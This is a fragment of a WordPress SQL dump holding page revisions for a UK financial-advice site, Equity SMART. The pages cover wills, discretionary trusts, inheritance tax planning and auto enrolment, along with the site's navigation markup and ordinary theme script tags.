and letter of wishes. The Trustees will then look to execute your wishes in a timely fashion. Having two Solicitor Trustees ensures this happens quickly and efficiently.\r\n\r\nDo I need a Will then? - Yes, Wills are extremely important. Any estate which is in your name when you die will be dealt with according to the terms of your Will, assuming the class of beneficiaries names remains the same. We will discuss this with you when setting up the trust.','Asset Protection','Did you know that 1 in 3 women & 1 in 4 men over 65 will go into care? And the Council can take all your assets - including your house - to pay for it?','inherit','closed','closed','','49-revision-v1','','','2017-09-21 17:11:40','2017-09-21 17:11:40','',49,'http://www.equalitywalk.org.uk/49-revision-v1',0,'revision','',0),(311,1,'2018-05-11 11:08:08','2018-05-11 11:08:08','<h4>Any transfers between a husband and wife, or civil partner, are exempt for inheritance tax which means that none is payable upon the death of the first spouse.</h4>\n<img class=\"size-medium wp-image-234 alignright\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/glasses-272399_1280-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />With the death of the surviving spouse, however, this tax then becomes due on the estate held by them, should its value exceed £650,000.\n\nAny balance over the threshold of £650,000 is liable to taxation at a rate of 40%; however, it is still very important to ensure that wills and trusts are put in place to make sure that your estate planning runs smoothly.\n\nCreating a standard will, in which all inheritance is left to the spouse, may avoid the paying of inheritance tax. Whilst it is possible to leave up to £325,000 without this tax becoming payable, for example, to your children, this could leave your spouse with some financial difficulties.\n\nIn the case of joint estates, it is no longer necessary to have Nil Rate Band Discretionary Trusts if the value is under £650,000 but in some situation, they can prove to be very useful indeed. For mitigation of inheritance tax, Nil Rate Band planning is not usually considered; however, it is often used for protection in certain situations. <a href=\"http://www.equalitywalk.org.uk/start-fundraising\">Find out more about wills</a>.\n<h2>Some of the Major Benefits of Discretionary Trust Schemes</h2>\n<ul>\n 	<li>Access to Financial Funds by the Surviving Spouse</li>\n 	<li>The surviving spouse may be entitled to interest free loans which then become repayable upon their death, thereby further reducing their IHT liability.</li>\n 	<li>If the surviving spouse requires long term care, all assets which are held in trust are not deemed to be capital.</li>\n 	<li>It ensures that assets which are held in trust are passed to your children, rather than those of a new partner of your spouse, should they re-marry.</li>\n 	<li>Offers a degree of protection against bankruptcy, should it occur.</li>\n</ul>\n<h2>Other Important Considerations</h2>\n<img class=\"size-medium wp-image-228 alignleft\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/coins-1523383_1280-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />Upon death, all joint assets are passed directly to the surviving spouse and are not passed under the will. These assets cannot be used to fund the Trust Fund. It is possible that it may be necessary to equalise the respective estates to be certain that both spouses have sufficient assets each, so that the Nil Rate Band Trust can be used to its greatest effect.\n\nIn the vast majority of situations, it is the family home which is the largest asset owned by both spouses, together. It may, on occasion, be necessary to divide any properties between the spouses in order to ensure that each has sufficient sole assets to be able to satisfy the Nil Rate Band Trust. With each then owning 50% of the property, on the death of the first spouse, their 50% share can be used to satisfy the Nil Rate Band Discretionary Trusts.\n\nBy using specialist terminology within the trust, it is possible for the surviving spouse to remain in possession of the whole property, but the value of the share of the deceased person will be out with the surviving spouse’s estate. All assets in this type of trust arrangement can not be regarded as capital held by the spouse, should they require long term care.\n<h2>What else should you consider?</h2>\n<em>When getting your affairs in order, there is much more to think about than just your will.</em>\n\nDon\'t leave your family in the lurch and begin plans for your funeral today. This means that all costs will be covered, as well as the burial or cremation.\n\n<footer class=\"footer-area\">\n<div class=\"avada-row\">\n\nAlthough the initial planning of your funeral may seem morbid, however getting these preparations in order has many benefits. People are using pre-paid funeral plans to give peace of mind for them and their loved ones.\n\nFor residents based in Blackpool and local areas, we recommend FuneralGuide.co.uk as they can assist you with finding the right funeral director, save money and help you plan your funeral.  <a href=\"https://www.funeralguide.co.uk/funeral-directors/blackpool/\" target=\"_blank\">Go to this site</a>.\n\n</div>\n</footer>','Wills and Trusts with Equity SMART','','inherit','closed','closed','','120-autosave-v1','','','2018-05-11 11:08:08','2018-05-11 11:08:08','',120,'http://www.equalitywalk.org.uk/120-autosave-v1',0,'revision','',0),(312,1,'2017-09-21 17:16:24','2017-09-21 17:16:24','<div id=\"wrapper\">\r\n<div class=\"page-title-container\">\r\n<div class=\"page-title\">\r\n<div class=\"page-title-wrapper\">\r\n<div class=\"page-title-captions\">\r\n<h1 class=\"entry-title\">Wills and Trusts</h1>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div id=\"main\" class=\"\" style=\"overflow: hidden !important;\">\r\n<div class=\"avada-row\">\r\n<div id=\"content\" style=\"float: right;\">\r\n<div id=\"post-144\" class=\"post-144 page type-page status-publish hentry\">\r\n<div class=\"post-content\">\r\n<h4>Any transfers between a husband and wife, or civil partner, are exempt for inheritance tax which means that none is payable upon the death of the first spouse.</h4>\r\n<img class=\"size-medium wp-image-234 alignright\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/glasses-272399_1280-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />With the death of the surviving spouse, however, this tax then becomes due on the estate held by them, should its value exceed £650,000.\r\n\r\nAny balance over the threshold of £650,000 is liable to taxation at a rate of 40%; however, it is still very important to ensure that wills and trusts are put in place to make sure that your estate planning runs smoothly.\r\n\r\nCreating a standard will, in which all inheritance is left to the spouse, may avoid the paying of inheritance tax. Whilst it is possible to leave up to £325,000 without this tax becoming payable, for example, to your children, this could leave your spouse with some financial difficulties.\r\n\r\nIn the case of joint estates, it is no longer necessary to have Nil Rate Band Discretionary Trusts if the value is under £650,000 but in some situation, they can prove to be very useful indeed. For mitigation of inheritance tax, Nil Rate Band planning is not usually considered; however, it is often used for protection in certain situations.\r\n\r\n&nbsp;\r\n<h2>Some of the Major Benefits of Discretionary Trust Schemes</h2>\r\n<ul>\r\n<ul>\r\n 	<li>Access to Financial Funds by the Surviving Spouse</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>The surviving spouse may be entitled to interest free loans which then become repayable upon their death, thereby further reducing their IHT liability.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>If the surviving spouse requires long term care, all assets which are held in trust are not deemed to be capital.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>It ensures that assets which are held in trust are passed to your children, rather than those of a new partner of your spouse, should they re-marry.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>Offers a degree of protection against bankruptcy, should it occur.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<h2>Other Important Considerations</h2>\r\n<img class=\"size-medium wp-image-228 alignleft\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/coins-1523383_1280-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />Upon death, all joint assets are passed directly to the surviving spouse and are not passed under the will. These assets cannot be used to fund the Trust Fund. It is possible that it may be necessary to equalise the respective estates to be certain that both spouses have sufficient assets each, so that the Nil Rate Band Trust can be used to its greatest effect.\r\n\r\nIn the vast majority of situations, it is the family home which is the largest asset owned by both spouses, together. It may, on occasion, be necessary to divide any properties between the spouses in order to ensure that each has sufficient sole assets to be able to satisfy the Nil Rate Band Trust. With each then owning 50% of the property, on the death of the first spouse, their 50% share can be used to satisfy the Nil Rate Band Discretionary Trusts.\r\n\r\nBy using specialist terminology within the trust, it is possible for the surviving spouse to remain in possession of the whole property, but the value of the share of the deceased person will be out with the surviving spouse’s estate. All assets in this type of trust arrangement can not be regarded as capital held by the spouse, should they require long term care.<script src=\"/wp-content/themes/Avada/js/main-min.js\" type=\"text/javascript\">// <![CDATA[\r\n</body></p>\r\n// ]]></script>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<footer class=\"footer-area\">\r\n<div class=\"avada-row\"></div>\r\n</footer></div>','Wills and Trusts with Equity SMART','Any transfers between a husband and wife or civil partner are exempt from inheritance tax, so no inheritance tax is payable on the death of the first spouse','inherit','closed','closed','','120-revision-v1','','','2017-09-21 17:16:24','2017-09-21 17:16:24','',120,'http://www.equalitywalk.org.uk/120-revision-v1',0,'revision','',0),(313,1,'2017-09-21 17:17:23','2017-09-21 17:17:23','<h4>Any transfers between a husband and wife, or civil partner, are exempt for inheritance tax which means that none is payable upon the death of the first spouse.</h4>\r\n<img class=\"size-medium wp-image-234 alignright\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/glasses-272399_1280-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />With the death of the surviving spouse, however, this tax then becomes due on the estate held by them, should its value exceed £650,000.\r\n\r\nAny balance over the threshold of £650,000 is liable to taxation at a rate of 40%; however, it is still very important to ensure that wills and trusts are put in place to make sure that your estate planning runs smoothly.\r\n\r\nCreating a standard will, in which all inheritance is left to the spouse, may avoid the paying of inheritance tax. Whilst it is possible to leave up to £325,000 without this tax becoming payable, for example, to your children, this could leave your spouse with some financial difficulties.\r\n\r\nIn the case of joint estates, it is no longer necessary to have Nil Rate Band Discretionary Trusts if the value is under £650,000 but in some situation, they can prove to be very useful indeed. For mitigation of inheritance tax, Nil Rate Band planning is not usually considered; however, it is often used for protection in certain situations.\r\n\r\n&nbsp;\r\n<h2>Some of the Major Benefits of Discretionary Trust Schemes</h2>\r\n<ul>\r\n<ul>\r\n 	<li>Access to Financial Funds by the Surviving Spouse</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>The surviving spouse may be entitled to interest free loans which then become repayable upon their death, thereby further reducing their IHT liability.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>If the surviving spouse requires long term care, all assets which are held in trust are not deemed to be capital.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>It ensures that assets which are held in trust are passed to your children, rather than those of a new partner of your spouse, should they re-marry.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>Offers a degree of protection against bankruptcy, should it occur.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<h2>Other Important Considerations</h2>\r\n<img class=\"size-medium wp-image-228 alignleft\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/coins-1523383_1280-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />Upon death, all joint assets are passed directly to the surviving spouse and are not passed under the will. These assets cannot be used to fund the Trust Fund. It is possible that it may be necessary to equalise the respective estates to be certain that both spouses have sufficient assets each, so that the Nil Rate Band Trust can be used to its greatest effect.\r\n\r\nIn the vast majority of situations, it is the family home which is the largest asset owned by both spouses, together. It may, on occasion, be necessary to divide any properties between the spouses in order to ensure that each has sufficient sole assets to be able to satisfy the Nil Rate Band Trust. With each then owning 50% of the property, on the death of the first spouse, their 50% share can be used to satisfy the Nil Rate Band Discretionary Trusts.\r\n\r\nBy using specialist terminology within the trust, it is possible for the surviving spouse to remain in possession of the whole property, but the value of the share of the deceased person will be out with the surviving spouse’s estate. All assets in this type of trust arrangement can not be regarded as capital held by the spouse, should they require long term care.<script src=\"/wp-content/themes/Avada/js/main-min.js\" type=\"text/javascript\">// <![CDATA[\r\n</body></p>\r\n<p>\r\n</p>\r\n<p>\r\n// ]]></script>\r\n\r\n<footer class=\"footer-area\">\r\n<div class=\"avada-row\"></div>\r\n</footer>','Wills and Trusts with Equity SMART','Any transfers between a husband and wife or civil partner are exempt from inheritance tax, so no inheritance tax is payable on the death of the first spouse','inherit','closed','closed','','120-revision-v1','','','2017-09-21 17:17:23','2017-09-21 17:17:23','',120,'http://www.equalitywalk.org.uk/120-revision-v1',0,'revision','',0),(314,1,'2017-09-21 17:17:36','2017-09-21 17:17:36','<h4>Any transfers between a husband and wife, or civil partner, are exempt for inheritance tax which means that none is payable upon the death of the first spouse.</h4>\r\n<img class=\"size-medium wp-image-234 alignright\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/glasses-272399_1280-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />With the death of the surviving spouse, however, this tax then becomes due on the estate held by them, should its value exceed £650,000.\r\n\r\nAny balance over the threshold of £650,000 is liable to taxation at a rate of 40%; however, it is still very important to ensure that wills and trusts are put in place to make sure that your estate planning runs smoothly.\r\n\r\nCreating a standard will, in which all inheritance is left to the spouse, may avoid the paying of inheritance tax. Whilst it is possible to leave up to £325,000 without this tax becoming payable, for example, to your children, this could leave your spouse with some financial difficulties.\r\n\r\nIn the case of joint estates, it is no longer necessary to have Nil Rate Band Discretionary Trusts if the value is under £650,000 but in some situation, they can prove to be very useful indeed. For mitigation of inheritance tax, Nil Rate Band planning is not usually considered; however, it is often used for protection in certain situations.\r\n\r\n&nbsp;\r\n<h2>Some of the Major Benefits of Discretionary Trust Schemes</h2>\r\n<ul>\r\n<ul>\r\n 	<li>Access to Financial Funds by the Surviving Spouse</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>The surviving spouse may be entitled to interest free loans which then become repayable upon their death, thereby further reducing their IHT liability.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>If the surviving spouse requires long term care, all assets which are held in trust are not deemed to be capital.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>It ensures that assets which are held in trust are passed to your children, rather than those of a new partner of your spouse, should they re-marry.</li>\r\n</ul>\r\n</ul>\r\n<ul>\r\n<ul>\r\n 	<li>Offers a degree of protection against bankruptcy, should it occur.</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<h2>Other Important Considerations</h2>\r\n<img class=\"size-medium wp-image-228 alignleft\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2017/09/coins-1523383_1280-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />Upon death, all joint assets are passed directly to the surviving spouse and are not passed under the will. These assets cannot be used to fund the Trust Fund. It is possible that it may be necessary to equalise the respective estates to be certain that both spouses have sufficient assets each, so that the Nil Rate Band Trust can be used to its greatest effect.\r\n\r\nIn the vast majority of situations, it is the family home which is the largest asset owned by both spouses, together. It may, on occasion, be necessary to divide any properties between the spouses in order to ensure that each has sufficient sole assets to be able to satisfy the Nil Rate Band Trust. With each then owning 50% of the property, on the death of the first spouse, their 50% share can be used to satisfy the Nil Rate Band Discretionary Trusts.\r\n\r\nBy using specialist terminology within the trust, it is possible for the surviving spouse to remain in possession of the whole property, but the value of the share of the deceased person will be out with the surviving spouse’s estate. All assets in this type of trust arrangement can not be regarded as capital held by the spouse, should they require long term care.<script src=\"/wp-content/themes/Avada/js/main-min.js\" type=\"text/javascript\">// <![CDATA[\r\n</body></p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n// ]]></script>\r\n\r\n<footer class=\"footer-area\">\r\n<div class=\"avada-row\"></div>\r\n</footer>','Wills and Trusts with Equity SMART','Any transfers between a husband and wife or civil partner are exempt from inheritance tax, so no inheritance tax is payable on the death of the first spouse','inherit','closed','closed','','120-revision-v1','','','2017-09-21 17:17:36','2017-09-21 17:17:36','',120,'http://www.equalitywalk.org.uk/120-revision-v1',0,'revision','',0),(315,1,'2017-09-21 17:20:04','2017-09-21 17:20:04','<div id=\"wrapper\">\n<div class=\"header-wrapper\">\n<div class=\"header-v3\"><header id=\"header\">\n<div class=\"avada-row\" style=\"margin-top: 0px; margin-bottom: 0px;\"><nav id=\"nav\" class=\"nav-holder\">\n<ul class=\"navigation menu fusion-navbar-nav\">\n<ul class=\"navigation menu fusion-navbar-nav\">\n 	<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\">\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-3 container\">\n<div class=\"row\">\n<div style=\"clear: both;\"></div>\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n<h3 class=\"fusion-megamenu-title\"><a href=\"/investments\">Investments</a></h3>\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"isas\">ISAs</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"lump-sum-investment\">Lump Sum Investment</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"offshore-bonds\">Offshore Bonds</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"unit-trusts-oeics\">Unit Trusts &amp; OEICs</a></li>\n</ul>\n</ul>\n&nbsp;\n<h3 class=\"fusion-megamenu-title\"><a href=\"/trusts\">Trusts</a></h3>\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"/asset-protection-trust\">Asset Protection Trust</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Trust</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>\n</ul>\n</ul>\n&nbsp;\n<h3 class=\"fusion-megamenu-title\"><a href=\"/insurance-protection\">Insurance</a></h3>\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"/critical-illness-insurance-2-0\">Critical Illness</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"/serious-illness-cover\">Serious Illness</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"/relevant-life-plan\">Relevant Life Plan</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"/life-insurance\">Life Insurance</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"/business-protection-insurance\">Business Protection</a></li>\n</ul>\n</ul>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"navigation menu fusion-navbar-nav\">\n<ul class=\"navigation menu fusion-navbar-nav\">\n 	<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"/about-us\">About</a>\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"/our-team\">Our Team</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"/about-us/testimonials\">Testimonials</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\">Login</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"/terms-of-use\">Terms Of Use</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"/privacy-policy\">Privacy Policy</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"/cookies\">Cookies</a></li>\n</ul>\n</ul>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"navigation menu fusion-navbar-nav\">\n<ul class=\"navigation menu fusion-navbar-nav\">\n 	<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"/category/video-2\">Watch Our Blog</a>\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"/pension-reforms-offer-freedom-savers\">Pension Reforms Offer Freedom to Savers</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"/staging-date-social-advisors\">When is your Staging Date?</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"/automatic-enrolment\">What is Automatic Enrolment</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"/new-individual-savings-accounts-qa\">The New Individual Savings Accounts — Q&amp;A</a></li>\n</ul>\n</ul>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"/our-blog\">Read Our Blog</a>\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"/category/annuities\">Annuities</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8588\"><a href=\"/category/insurance-protection\">Insurance Protection</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"/category/investments\">Investments</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8590\"><a href=\"/category/pensions\">Pensions</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"/category/trusts\">Trusts</a></li>\n</ul>\n</ul>\n&nbsp;\n<ul class=\"sub-menu\">\n<ul class=\"sub-menu\">\n 	<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8592\"><a href=\"/category/wealth-management\">Wealth Management</a></li>\n</ul>\n</ul>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;</li>\n</ul>\n</ul>\n&nbsp;\n\n</nav>\n<div class=\"mobile-nav-holder main-menu\"></div>\n</div>\n&nbsp;\n\n</header></div>\n<div class=\"init-sticky-header\"></div>\n</div>\n&nbsp;\n<div id=\"sliders-container\"></div>\n&nbsp;\n<div class=\"page-title-container\">\n\n&nbsp;\n<div class=\"page-title\">\n\n&nbsp;\n<div class=\"page-title-wrapper\">\n\n&nbsp;\n<div class=\"page-title-captions\">\n\n&nbsp;\n<h1 class=\"entry-title\">\nA Guide To Auto Enrolment</h1>\n&nbsp;\n\n</div>\n&nbsp;\n<ul class=\"breadcrumbs\">\n 	<li><a href=\"/\">Home</a></li>\n 	<li><a href=\"/\" rel=\"tag\">Auto Enrolment</a> /  <a href=\"/portfolio_category/guides\" rel=\"tag\">Guides</a></li>\n 	<li>A Guide To Auto Enrolment</li>\n</ul>\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n<div id=\"main\" class=\"clearfix \">\n\n&nbsp;\n<div class=\"avada-row\">\n\n&nbsp;\n<div id=\"content\" class=\"portfolio-full with-sidebar\" style=\"float: left;\">\n\n&nbsp;\n<div class=\"single-navigation clearfix\">\n<a href=\"/\" rel=\"prev\">Previous</a>\n<a href=\"/portfolio-items/critical-illness-guide\" rel=\"next\">Next</a></div>\n&nbsp;\n<div id=\"post-6928\" class=\"post-6928 avada_portfolio type-avada_portfolio status-publish has-post-thumbnail hentry\">\n\n&nbsp;\n<div class=\"flexslider post-slideshow\">\n\n&nbsp;\n<ul class=\"slides\">\n<ul class=\"slides\">\n 	<li></li>\n</ul>\n</ul>\n&nbsp;\n\n</div>\n&nbsp;\n<div class=\"project-content\">\n<span class=\"entry-title\" style=\"display: none;\">A Guide To Auto Enrolment</span>\n<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a title=\"Posts by Equity SMART\" href=\"/author/rs-r-admin\" rel=\"author\">Equity SMART</a></span></span>\n<span class=\"updated\" style=\"display: none;\">2017-10-09T10:38:20+00:00</span>\n<div class=\"project-description post-content\">\n\n&nbsp;\n<h3>Project Description</h3>\n<a href=\"http://www.equalitywalk.org.uk/auto.pdf\" target=\"_blank\">Click Here To Download Your Guide To Auto Enrolment</a>\n\n&nbsp;\n\n</div>\n&nbsp;\n<div class=\"project-info\">\n\n&nbsp;\n\nProject Details\n\n&nbsp;\n<div class=\"project-info-box\">\n\n&nbsp;\n<h4>Categories:</h4>\n&nbsp;\n<div class=\"project-terms\">\n<a href=\"/\" rel=\"tag\">Auto Enrolment</a>\n<a href=\"/portfolio_category/guides\" rel=\"tag\">Guides</a></div>\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n<div class=\"portfolio-sep\"></div>\n</div>\n&nbsp;\n\n</div>\n&nbsp;\n<div id=\"sidebar\" style=\"float: right;\">\n<div id=\"text-24\" class=\"widget widget_text\">\n<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big>\n\npeople who get our best financial wisdom on a weekly basis.</center>\n<a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" target=\"_blank\"><script type=\"text/javascript\" src=\"/leadbox-694.js\"/></div>\n<p>&#13;\n		</div>\n<div id=\"recent_works-widget-2\" class=\"widget recent_works\">\n<div class=\"heading\">\n<p>New Guides</p>\n</div>\n<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"/portfolio-items/smart-money-nov-dec\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"/portfolio-items/critical-illness-guide\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"/portfolio-items/guide-auto-enrolment\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>\n<p>&#13;\n&#13;\n		</div>\n<div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">\n<div class=\"tab-holder\"><p>&#13;\n			</p>\n<div class=\"tab-hold tabs-wrapper\"><p>&#13;\n				</p>\n<ul id=\"tabs\" class=\"tabset tabs\">\n<li><a href=\"#tab-popular\">Popular</a></li>\n<p>&#13;\n															</p>\n<li><a 